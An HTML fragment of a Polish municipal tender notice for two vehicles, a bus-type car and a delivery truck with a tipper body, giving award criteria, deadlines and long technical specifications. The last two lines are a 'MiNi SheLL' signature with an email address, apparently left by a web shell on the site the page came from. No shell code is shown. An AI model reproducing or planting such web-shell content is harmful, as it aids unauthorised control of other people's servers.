                Przewiduje się pobranie ze złożonych katalogów elektronicznych informacji potrzebnych do sporządzenia ofert w ramach umowy ramowej/dynamicznego systemu zakupów:
                <br />
                  nie
                </div><br /><b>IV.1.8) Aukcja elektroniczna </b><br /><b>
                Przewidziane jest przeprowadzenie aukcji elektronicznej </b><i>(przetarg nieograniczony, przetarg ograniczony, negocjacje z ogłoszeniem) </i>
                nie
              <br /><b>Należy wskazać elementy, których wartości będą przedmiotem aukcji elektronicznej: </b><br /><b>Przewiduje się ograniczenia co do przedstawionych wartości, wynikające z opisu przedmiotu zamówienia:</b><br />
                nie
              <br />

              
                Należy podać, które informacje zostaną udostępnione wykonawcom w trakcie aukcji elektronicznej oraz jaki będzie  termin ich udostępnienia:
              
              <br />
              Informacje dotyczące przebiegu aukcji elektronicznej: 
              <br />
              Jaki jest przewidziany sposób postępowania w toku aukcji elektronicznej i jakie będą warunki, na jakich wykonawcy będą mogli licytować (minimalne wysokości postąpień): 
              <br />
              Informacje dotyczące wykorzystywanego sprzętu elektronicznego, rozwiązań i specyfikacji technicznych w zakresie połączeń:
              <br />
              Wymagania dotyczące rejestracji i identyfikacji wykonawców w aukcji elektronicznej: 
              <br />


              Informacje o liczbie etapów aukcji elektronicznej i czasie ich trwania: 
              <div style="padding-left: 20px">
                  Aukcja wieloetapowa
                  <table><tr><td>etap nr</td><td>czas trwania etapu</td></tr><tr><td></td><td></td></tr></table><br />
                Czy wykonawcy, którzy nie złożyli nowych postąpień, zostaną zakwalifikowani do następnego etapu:
                
                  nie
                <br />
                Warunki zamknięcia aukcji elektronicznej:
                <br /></div><br /><b>IV.2) KRYTERIA OCENY OFERT </b><br /><b>IV.2.1) Kryteria oceny ofert: </b><br /><b>IV.2.2) Kryteria</b><br /><div style="padding-left: 20px"><table><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td>cena brutto oferty</td><td>60</td></tr><tr><td>wielkość zużycia energii</td><td>10</td></tr><tr><td>wielkość emisji dwutlenku węgla </td><td>10</td></tr><tr><td>gwarancja na perforację nadwozia</td><td>20</td></tr></table></div><br /><b>IV.2.3) Zastosowanie procedury, o której mowa w art. 24aa ust. 1 ustawy Pzp </b>(przetarg nieograniczony)
              <br />
                tak
              <br /><b>IV.3) Negocjacje z ogłoszeniem, dialog konkurencyjny, partnerstwo innowacyjne </b><br /><b>IV.3.1) Informacje na temat negocjacji z ogłoszeniem</b><br />
              Minimalne wymagania, które muszą spełniać wszystkie oferty:
              <br /><br />
              Przewidziane jest zastrzeżenie prawa do udzielenia zamówienia na podstawie ofert wstępnych bez przeprowadzenia negocjacji
              
                nie
              <br />
              Przewidziany jest podział negocjacji na etapy w celu ograniczenia liczby ofert:
              
                nie
              <br />
              Należy podać informacje na temat etapów negocjacji (w tym liczbę etapów):
              <br /><br />
              Informacje dodatkowe
              <br /><br /><br /><b>IV.3.2) Informacje na temat dialogu konkurencyjnego</b><br />
              Opis potrzeb i wymagań zamawiającego lub informacja o sposobie uzyskania tego opisu:
              <br /><br />
              Informacja o wysokości nagród dla wykonawców, którzy podczas dialogu konkurencyjnego przedstawili rozwiązania stanowiące podstawę do składania ofert, jeżeli zamawiający przewiduje nagrody:
              <br /><br />
              Wstępny harmonogram postępowania:
              <br /><br />
              Podział dialogu na etapy w celu ograniczenia liczby rozwiązań:
              
                nie
              <br />
              Należy podać informacje na temat etapów dialogu:
              <br /><br /><br />
              Informacje dodatkowe:
              <br /><br /><b>IV.3.3) Informacje na temat partnerstwa innowacyjnego</b><br />
              Elementy opisu przedmiotu zamówienia definiujące minimalne wymagania, którym muszą odpowiadać wszystkie oferty:
              <br /><br />
              Podział negocjacji na etapy w celu ograniczeniu liczby ofert podlegających negocjacjom poprzez zastosowanie kryteriów oceny ofert wskazanych w specyfikacji istotnych warunków zamówienia:
              <br />
                nie
              <br />
              Informacje dodatkowe:
              <br /><br /><b>IV.4) Licytacja elektroniczna  </b><br />
              Adres strony internetowej, na której będzie prowadzona licytacja elektroniczna:
              <br /><div style="padding-left: 20px"></div>

              Adres strony internetowej, na której jest dostępny opis przedmiotu zamówienia w licytacji elektronicznej:
              <br /><div style="padding-left: 20px"></div>

              Wymagania dotyczące rejestracji i identyfikacji wykonawców w licytacji elektronicznej, w tym wymagania techniczne urządzeń informatycznych:
              <br /><div style="padding-left: 20px"></div>

              Sposób postępowania w toku licytacji elektronicznej, w tym określenie minimalnych wysokości postąpień:
              <br /><div style="padding-left: 20px"></div>

              Informacje o liczbie etapów licytacji elektronicznej i czasie ich trwania: 
              <div style="padding-left: 20px">
                  Licytacja wieloetapowa
                  <table><tr><td>etap nr</td><td>czas trwania etapu</td></tr><tr><td></td><td></td></tr></table><br />
                Wykonawcy, którzy nie złożyli nowych postąpień, zostaną  zakwalifikowani do następnego etapu:
                
                  nie
                </div>

              Termin otwarcia licytacji elektronicznej:
              <br /><div style="padding-left: 20px"></div>

              Termin i warunki zamknięcia licytacji elektronicznej:
              <br /><div style="padding-left: 20px"></div><br />
              Istotne dla stron postanowienia, które zostaną wprowadzone do treści zawieranej umowy w sprawie zamówienia publicznego, albo ogólne warunki umowy, albo wzór umowy:
              <br /><div style="padding-left: 20px"></div><br />
              Wymagania dotyczące zabezpieczenia należytego wykonania umowy: 
              <br /><div style="padding-left: 20px"></div><br />
              Informacje dodatkowe:
              <br /><div style="padding-left: 20px"></div><b>IV.5) ZMIANA UMOWY</b><br /><b>Przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy:</b>
                nie
              <br /><b>IV.6) INFORMACJE ADMINISTRACYJNE </b><br /><br /><b>IV.6.1) Sposób udostępniania informacji o charakterze poufnym </b><i>(jeżeli dotyczy): </i><br /><br /><b>Środki służące ochronie informacji o charakterze poufnym</b><br /><br /><b>IV.6.2) Termin składania ofert lub wniosków o dopuszczenie do udziału w postępowaniu: </b><br />
              Data: 03/11/2016, godzina: 13:00,
              <br />
              Skrócenie terminu składania wniosków, ze względu na pilną potrzebę udzielenia zamówienia (przetarg nieograniczony, przetarg ograniczony, negocjacje z ogłoszeniem):
              <br />
                nie
              <br />
              Wskazać powody:
              <br />nie dotyczy<br />
              Język lub języki, w jakich mogą być sporządzane oferty lub wnioski o dopuszczenie do udziału w postępowaniu
              <br />&gt;
              język polski<br /><b>IV.6.3) Termin związania ofertą: </b>
                okres w dniach: 30 (od ostatecznego terminu składania ofert)
              <br /><b>IV.6.4) Przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia:</b>
                nie
              <br /><b>IV.6.5) Przewiduje się unieważnienie postępowania o udzielenie zamówienia, jeżeli środki służące sfinansowaniu zamówień na badania naukowe lub prace rozwojowe, które zamawiający zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia, nie zostały mu przyznane</b>
                nie
              <br /><b>IV.6.6) Informacje dodatkowe:</b><br /></div></div><div class="headerLarge_xforms" style="text-align: center"><u>
                ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH
              </u></div><div><b>Część nr: </b>1
                  
                <b>Nazwa: </b>Dostawa samochodu osobowego typu bus (1 szt.) <br /><div style="padding-left: 20px"><b>
                    1) Krótki opis przedmiotu zamówienia </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>Przedmiotem zamówienia jest dostawa samochodu osobowego typu Bus 

Wymagania techniczne:

1)	dopuszczalna masa całkowita max 3, 5 tony,
2)	preferowany kolor szary lub beżowy,
3)	silnik wysokoprężny z turbo doładowaniem o mocy minimalnej 146 KM 
4)	pojemność silnika minimalna 1900m3  2300 m3,
5)	zbiornik paliwa min. 80 litrów,
6)	rozstaw osi minimum 3600 mm (L2H2),
7)	napęd na koła przednie,
8)	skrzynia biegów 6-cio biegowa, manualna, 
9)	samochód musi spełniać wymogi normy emisji spalin Euro 6 tzn. dopuszczalne wartości
 emisji zanieczyszczeń spalin,
10)	zamontowany hak holowniczy,
11)	komputer pokładowy,
12)	radio z nawigacją (dwa głośniki w kabinie kierowcy i dwa w przestrzeni pasażerskiej) 
i anteną niepodwyższającą wysokości pojazdu,
13)	regulowana kolumna kierownicy, wielofunkcyjna umożliwiająca obsługę radia i telefonu
 komórkowego, 
14)	trójpunktowe pasy bezpieczeństwa z napinaczami na wszystkich siedzeniach,
15)	fotel kierowcy z regulacją wysokości i podłokietnikiem, 
16)	obok fotela kierowcy  kanapa z 2 miejscami dla pasażera,
17)	3  osobowa kanapa w drugim rzędzie z 3 punktowymi pasami,
18)	3  osobowa kanapa w trzecim rzędzie z 3 punktowymi pasami,
19)	w tylnej części pojazdu za III rzędem foteli przestrzeń bagażowa o długości min. 1450 mm,
20)	systemy bezpieczeństwa: 
	elektroniczny system stabilizacji toru jazdy z asystentem hamowania  ESP 
	system zapobiegający blokowaniu kół podczas hamowania  ABS 
	system zapobiegający utracie przyczepności kół podczas przyspieszania  ASR 
21)	hamulce tarczowe z przodu i z tyłu,
22)	układ hamulcowy hydrauliczny, 
23)	niezależne zawieszenie przednie kół,
24)	tempomat,
25)	wspomaganie układu kierowniczego,
26)	lusterko wsteczne wewnątrz kabiny,
27)	poduszki powietrzne w kabinie kierowcy: przednie dla kierowcy i pasażera,
28)	nadwozie minimum 4-ro drzwiowe, w tym:
	drzwi boczne przesuwne z prawej strony,
	drzwi tylne otwierane, przeszklone, ogrzewane,
29)	tylne drzwi przeszklone otwierane pod kątem 180o,
30)	okno przesuwne w przestrzeni pasażerskiej z lewej strony,
31)	elektrycznie sterowane szyby w kabinie kierowcy,
32)	przyciemniane dodatkowo szyby w przestrzeni pasażerskiej,
33)	lusterka zewnętrzne elektrycznie ogrzewane i sterowane,
34)	autoalarm,
35)	immobiliser,
36)	centralny zamek z możliwością uruchamiania od wewnątrz sterowany pilotem, 
37)	dwa kluczyki,
38)	klimatyzacja manualna, z nawiewem na przód i tył samochodu,
39)	ogrzewanie przestrzeni pasażerskiej (drugi wymiennik ciepła),
40)	oświetlenie przestrzeni pasażerskiej,
41)	dywaniki podłogowe gumowe,
42)	fotele wyłożone tkaniną tekstylną,
43)	reflektory przeciwmgielne przednie,
44)	światła do jazdy dziennej włączane automatycznie,  
45)	dodatkowe tylne światło STOP,
46)	czujki cofania,
47)	dodatkowy komplet kół z oponami letnimi/zimowymi, 
48)	apteczka,
49)	trójkąt ostrzegawczy,
50)	gaśnica,
51)	pełnowymiarowe koło zapasowe (pod podłogą),
<br /><b>2) Wspólny Słownik Zamówień (CPV): </b>34115200-8<br /><b>3) Wartość części zamówienia (jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br />
                  Wartość bez VAT:
                  <br />
                  Waluta:
                  <br /><div style="padding-left: 20px"><br /><b>4) Czas trwania lub termin wykonania: </b>
                      data zakończenia: 10/02/2017<br /><b>5) Kryteria oceny ofert: </b><table style="padding-left: 20px"><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td>cena brutto oferty</td><td>60</td></tr><tr><td>wielkość zużycia energii</td><td>10</td></tr><tr><td>wielkość emisji dwutlenku węgla</td><td>10</td></tr><tr><td>gwarancja na perforację nadwozia </td><td>20</td></tr></table><b>
                      6) INFORMACJE DODATKOWE:
                    </b><br /></div></div><br /></div><div><b>Część nr: </b>2
                  
                <b>Nazwa: </b>Dostawa samochodu  osobowego typu dostawczego<br /><div style="padding-left: 20px"><b>
                    1) Krótki opis przedmiotu zamówienia </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>Przedmiotem zamówienia jest dostawa samochodu  osobowego typu dostawczego

Wymagania techniczne: 

1)	dopuszczalna masa całkowita max 3, 5 tony
2)	silnik diesel 4 - cylindrowy, rzędowy, 16 - zaworowy, 
3)	moc  min. 150 KM,
4)	pojemność silnika min. 3000 m3,
5)	zbiornik paliwa minimum 80l,
6)	samochód musi spełniać wymogi normy emisji spalin Euro 6 tzn. dopuszczalne wartości emisji zanieczyszczeń spalin,
7)	akumulator 12V  110 Ah
8)	alternator wzmocniony 150A,
9)	skrzynia biegów mechaniczna,
10)	podwozie dwuosiowe,
11)	układ jezdny 4 x 2 z napędem na tylną oś,
12)	nadwozie zabezpieczone antykorozyjnie,
13)	hamulce tarczowe z przodu i z tyłu, 
14)	systemy bezpieczeństwa: 
	elektroniczny system stabilizacji toru jazdy z asystentem hamowania  ESP 
	system zapobiegający blokowaniu kół podczas hamowania  ABS 
	 system zapobiegający utracie przyczepności kół podczas przyspieszania  ASR
	 układ umożliwiający zatrzymanie pojazdu na wzniesieniu,
15)	kabina 7 osobowa, 
16)	klimatyzacja automatyczna,
17)	konstrukcja ramowa,
18)	komputer pokładowy,
19)	poduszka powietrzna kierowcy,
20)	regulowana kolumna kierownicy,
21)	wspomaganie układu kierowniczego,
22)	regulowany fotel kierowcy,
23)	podwójny fotel pasażera ze schowkiem pod siedziskami,
24)	ławka dla 4 pasażerów ze schowkiem na całej długości pod siedziskiem,
25)	pokrowce na siedzenia wykonane z materiału odpornego na ścieranie oraz na zabrudzenia,
26)	zewnętrzne lusterka szerokokątne, elektrycznie sterowane i podgrzewane na długim ramieniu,
27)	elektrycznie sterowane szyby boczne w drzwiach przednich,
28)	okna w tylnej ścianie kabiny,
29)	belka świetlna LED ostrzegawcza montowana na kabinie z kloszami w kolorze żółtym w polu tekstowym napis naklejany od przodu GMINA ZAGNAŃSK, z tyłu herb gminy ZAGNAŃSK,
30)	zamontowany hak holowniczy kulowy oraz złącze elektryczne 13 PIN-DIN,
31)	osłona miski olejowej,
32)	blokada tylnego mostu,
33)	przednie zawieszenie z regulowanym drążkiem skrętnym umocowanym do podłużnicy ramy,
34)	wzmocnione tylne zawieszenie ( powyżej 10 piór na stronę),
35)	światła do jazdy dziennej włączane automatycznie,
36)	podgrzewany filtr paliwa,
37)	immobiliser fabryczny,
38)	centralny zamek ze zdalnym sterowaniem,
39)	radio CD, 
40)	koła pojedyncze na przedniej osi 195/75 R16C,
41)	koła podwójne na tylnej osi: 195/75 R16C,
42)	komplet opon zimowych 6 szt.,
43)	nadkola z tworzywa sztucznego,
44)	listwy boczne przeciwnajazdowe,
45)	pełnowymiarowe koło zapasowe,
46)	trójkąt ostrzegawczy, 
47)	apteczka, 
48)	gaśnica,
49)	klin pod koła,  
50)	skrzynka narzędziowa,
51)	długość zabudowy zewnętrznej minimum 3200 mm,
52)	szerokość zewnętrzna max. 2100 mm,
53)	podłoga z blachy stalowej, spawana,
54)	burty boczne aluminiowe min. 400 mm dwustronne, zamykane kasetowo, otwierane w osi dolnej,
55)	konstrukcja ramy pośredniej ze stali o podwyższonej wytrzymałości S235 spawana ocynkowana lub lakierowana wielowarstwowo RAL 7016,
56)	konstrukcja skrzyni wywrotu ze stali o podwyższonej wytrzymałości S235, spawana a następnie lakierowana wielowartwowo RAL 7016,
57)	burty stalowe lakierowane wielowarstwowo 7016,
58)	burta tylna otwierana w osi dolnej i górnej, samoczynnie otwierana podczas wywrotu,
59)	osłona kabiny i skrzyni narzędziowej z siatki stalowej ocynkowanej do wysokości kabiny,
60)	nadstawki  z siatki stalowej ocynkowane o wysokości równej z kabiną uchylane w osi górnej, demontowane,
61)	system wywrotu hydrauliczny, napęd pompy elektryczny POWERPACK,
62)	siłownik wywrotu o udźwigu 5T
63)	wywrot trzy stronny sterowany z kabiny kierowcy,
64)	oświetlenie zgodne z PRD I UE,
65)	dywaniki gumowe całosezonowe,
<br /><b>2) Wspólny Słownik Zamówień (CPV): </b>34130000-7<br /><b>3) Wartość części zamówienia (jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br />
                  Wartość bez VAT:
                  <br />
                  Waluta:
                  <br /><div style="padding-left: 20px"><br /><b>4) Czas trwania lub termin wykonania: </b>
                      data zakończenia: 10/02/2017<br /><b>5) Kryteria oceny ofert: </b><table style="padding-left: 20px"><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td>cena brutto oferty</td><td>60</td></tr><tr><td>wielkość zużycia energii</td><td>10</td></tr><tr><td>wielkość emisji dwutlenku węgla</td><td>10</td></tr><tr><td>gwarancja na perforację nadwozia </td><td>20</td></tr></table><b>
                      6) INFORMACJE DODATKOWE:
                    </b><br /></div></div><br /></div></div>

Creat By MiNi SheLL
Email: jattceo@gmail.com